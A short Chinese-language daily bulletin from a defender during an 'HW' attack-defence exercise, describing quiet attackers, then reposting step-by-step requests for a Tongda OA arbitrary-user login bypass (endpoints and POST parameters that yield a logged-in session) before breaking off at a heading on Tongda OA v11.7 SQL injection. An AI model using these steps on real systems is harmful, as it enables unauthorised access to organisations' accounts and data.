HW日报
蹲守机房的第五天,HW过去了三分之一多,机房依旧很冷,但是还好,这次我带了外套~
但是不敢松懈,要提醒自己时刻保持警惕,随时等候拔线的指令。
今年的HW尤其特别,特别到让人摸不着头脑。
·防守方安安静静、无报警、无应急、无溯源。互相打探、互相讨论:‘攻击队伍在干嘛?来了吗?怎么还没来?’
·攻击方小心翼翼,不用扫描器、不用脚本、重装电脑、清浏览器缓存、访问下网站判断是蜜罐立马就撤离,仿佛人间蒸发一般的招数。
往年防守方不扣分就是赢,今年防守方不抓到人就‘如同’输。
总之今年,一切都是静悄悄的~
今天很安静,但是请别大意
今天,你拔线了么?
“满当当的昨天,富意义的今天~”
今日主题:01今日收录、02情报收集、03弹药库
01今日收录
—
转载自:渗了个透
0、通达OA任意用户登录
1、首先访问/ispirit/login_code.php获取codeuid。
2、访问/general/login_code_scan.php提交post参数:
uid=1codeuid={9E-B-2A87-B0E9-EEA}
3、最后访问/ispirit/login_code_check.php?codeuid=xxx
这样$_SESSION里就有了登录的信息了。
1、通达OAv11.7后台SQL注入
来源: